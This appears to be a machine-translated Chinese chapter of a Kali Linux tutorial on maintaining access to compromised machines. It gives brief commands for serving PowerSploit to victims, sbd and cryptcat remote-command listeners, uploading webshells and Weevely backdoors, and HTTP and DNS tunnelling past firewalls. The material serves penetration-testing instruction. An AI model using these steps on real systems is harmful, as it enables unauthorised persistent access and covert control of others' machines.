- Kali Linux Tutorial
- Kali Linux - Home
- Installation & Configuration
- Information Gathering Tools
- Vulnerability Analyses Tools
- Kali Linux - Wireless Attacks
- Website Penetration Testing
- Kali Linux - Exploitation Tools
- Kali Linux - Forensics Tools
- Kali Linux - Social Engineering
- Kali Linux - Stressing Tools
- Kali Linux - Sniffing & Spoofing
- Kali Linux - Password Cracking Tools
- Kali Linux - Maintaining Access
- Kali Linux - Reverse Engineering
- Kali Linux - Reporting Tools
- Kali Linux Useful Resources
- Kali Linux - Quick Guide
- Kali Linux - Useful Resources
- Kali Linux - Discussion
Kali Linux - 维护访问
在本章中,我们将看到 Kali 用来维持连接和访问被黑客攻击的机器(即使它再次连接和断开连接)的工具。
强力攻击
这是一个适用于 Windows 机器的工具。它在受害者机器上安装了 PowerShell。该工具可帮助黑客通过 PowerShell 连接受害者的计算机。
要打开它,请打开左侧的终端并键入以下命令进入 powersploit 文件夹 -
cd /usr/share/powersploit/
如果您输入“ls”,它将列出您在获得访问权限后可以下载并安装在受害者计算机中的所有 powersploit 工具。他们中的大多数都是根据他们的名字来解释名字的。
在受害者的计算机上下载此工具的一个简单方法是创建一个 Web 服务器,powersploit 工具允许使用以下命令轻松创建该服务器 -
python -m SimpleHTTPServer
之后,如果您输入: http://<Kali machine ip_address>:8000/ 以下是结果。
SBD
sbd是一个类似于Netcat的工具。它是便携式的,可以在 Linux 和 Microsoft 机器上使用。sbd 具有 AES-CBC-128 + HMAC-SHA1 加密> 基本上,它有助于随时在特定端口上连接到受害者的计算机并远程发送命令。
要打开它,请转到终端并输入“sbd -l -p port”以使服务器接受连接。
在本例中,我们将端口 44 放在服务器监听的位置。
在受害者的站点上,输入“sbd IPofserver port”。将建立连接,我们可以在其中发送远程命令。
在本例中,它是“localhost”,因为我们是在同一台机器上执行测试的。
最后,在服务器上您将看到已发生连接,如以下屏幕截图所示。
Webshell
Webshell 可用于维护访问或破解网站。但其中大多数都能被防病毒软件检测到。C99 php shell 在防病毒软件中非常有名。任何常见的防病毒软件都会轻松地将其检测为恶意软件。
一般来说,它们的主要功能是通过Web界面发送系统命令。
要打开它,请在终端中输入“cd /usr/share/webshells/” 。
如您所见,它们根据编程语言分为几类:asp、aspx、cfm、jsp、perl、php
如果进入PHP文件夹,可以看到所有php网页的webshell。
要将 shell 上传到 Web 服务器,例如“simple-backdoor.php”,请打开 Web shell 的网页和 URL。
最后写入cmd命令。您将获得如下屏幕截图所示的所有信息。
威夫利
Weevely 是一个 PHP Web shell,可以模拟类似 telnet 的连接。它是一种用于 Web 应用程序后期利用的工具,可以用作隐形后门或 Web shell 来管理合法的 Web 帐户,甚至是免费托管的帐户。
要打开它,请转到终端并输入“weevely”,您可以在其中看到它的用法。
要生成 shell,请输入“weevelygeneratepasswordpathoffile”。如下图所示,它是在“桌面”文件夹中生成的,并且该文件将上传到网络服务器中以获得访问权限。
上传 Web shell 后(如下图所示),我们可以使用命令“weevely URL password”通过 cmd 连接到服务器,您可以看到会话已经启动。
http隧道
http-tunnel 创建在 HTTP 请求中通过隧道传输的双向虚拟数据流。如果需要,可以通过 HTTP 代理发送请求。这对于限制性防火墙后面的用户很有用。如果允许通过 HTTP 代理进行 WWW 访问,则可以使用 http-tunnel 和 telnet 或 PPP 连接到防火墙外部的计算机。
首先,我们应该使用以下命令创建一个隧道服务器 -
httptunnel_server –h
然后,在客户端站点上键入“httptunnel_client –h”,两者都将开始接受连接。
DNS2TCP
这又是一个隧道工具,有助于通过 DNS 流量(即 UDP 53 端口)传递 TCP 流量。
要启动它,请输入“dns2tcpd”。打开脚本时会解释用法。
在服务器站点上,输入此命令来配置文件。
#cat >>.dns2tcpdrc <&l;END listen = 0.0.0.0 port = 53 user=nobody chroot = /root/dns2tcp pid_file = /var/run/dns2tcp.pid domain = your domain key = secretkey resources = ssh:127.0.0.1:22 END #dns2tcpd -f .dns2tcpdrc
在客户端站点上,输入此命令。
# cat >>.dns2tcprc <<END domain = your domain resource = ssh local_port = 7891 key = secretkey END # dns2tcpc -f .dns2tcprc # ssh root@localhost -p 7891 -D 7076
隧道将从此命令启动。
密码猫
它是另一个类似 Netcat 的工具,允许以加密方式与受害者的计算机建立 TCP 和 UDP 连接。
要启动服务器来侦听连接,请输入以下命令 -
cryptcat –l –p port –n
在哪里,
-l代表监听连接
-p代表端口号参数
-n代表不进行名称解析
在客户端,连接命令为“cryptcat IPofServer PortofServer”